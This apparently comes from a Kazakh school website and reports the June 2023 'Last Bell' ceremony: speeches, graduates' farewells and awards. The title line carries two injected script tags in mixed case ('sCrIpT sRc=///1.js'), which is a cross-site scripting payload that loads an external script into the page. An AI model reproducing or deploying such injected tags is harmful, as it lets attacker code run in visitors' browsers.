Мектебімізде де «Соңғы қоңырау» салтанатты жиыны өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.06.2023
1 маусым мектебімізде «Соңғы қоңырау» салтанатты жиыны өтті. Салтанатты жиынға ата-аналар, қонақтар қатысты. Алғашқы құттықтау сөзді мектеп директоры Даирова Г.С. және ауыл әкімі Мухаметрахимов А.С алып, барлық оқушыларды мерекемен құттықтап, түлектерге ақ жол тіледі. Түлектердің ата-аналары, сынып жетекшілері және бастауыштағы алғашқы ұстаздарының ақ тілектері айтылып түлектерге ақ баталарын берді. Салтанатты жиында 9-11-ші сынып оқушылары алтын ұя мектебімен қоштасу сәттегі жүрекжарды тілектерін, әнмен, өлеңмен, қоштасу вальсімен жеткізді. 1-сынып оқушыларына жас түлектер «Білім кілтін» табыстады. Сондай-ақ, жыл бойы үздік, жақсы оқыған оқушылар, мектептің қоғамдық өміріне белсене араласқан оқушылар, ұстаздар, марапатталды. Салтанатты жиын соңында Жас түлектерге «Сәтті сапар» тілеп үлкен өмір жолына аттандырып, ортамыздан шығарып салдық.
 
Просмотров: 1311


Пікір қосу



Деректерді қолтаңбаға қосу